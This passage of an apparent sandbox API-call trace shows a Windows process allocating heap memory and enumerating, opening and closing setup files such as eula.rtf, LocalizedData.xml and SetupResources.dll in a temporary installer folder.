Size=0x20) returned 0x88518 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.383] AreFileApisANSI () returned 1 [0061.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0061.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0061.383] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63)) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.383] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.384] AreFileApisANSI () returned 1 [0061.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0061.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.384] AreFileApisANSI () returned 1 [0061.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0061.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0061.385] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.385] GetFileType (hFile=0x41c) returned 0x1 [0061.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.385] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.385] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.385] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.386] CloseHandle (hObject=0x41c) returned 1 [0061.386] AreFileApisANSI () returned 1 [0061.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0061.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0061.386] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.386] GetFileType (hFile=0x41c) returned 0x1 [0061.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.386] CloseHandle (hObject=0x41c) returned 1 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.387] AreFileApisANSI () returned 1 [0061.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0061.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0061.387] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62)) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.387] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.387] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.388] AreFileApisANSI () returned 1 [0061.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0061.389] AreFileApisANSI () returned 1 [0061.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0061.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0061.389] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.389] GetFileType (hFile=0x41c) returned 0x1 [0061.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.389] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.389] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.389] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.389] CloseHandle (hObject=0x41c) returned 1 [0061.390] AreFileApisANSI () returned 1 [0061.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0061.390] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.390] GetFileType (hFile=0x41c) returned 0x1 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.390] CloseHandle (hObject=0x41c) returned 1 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, 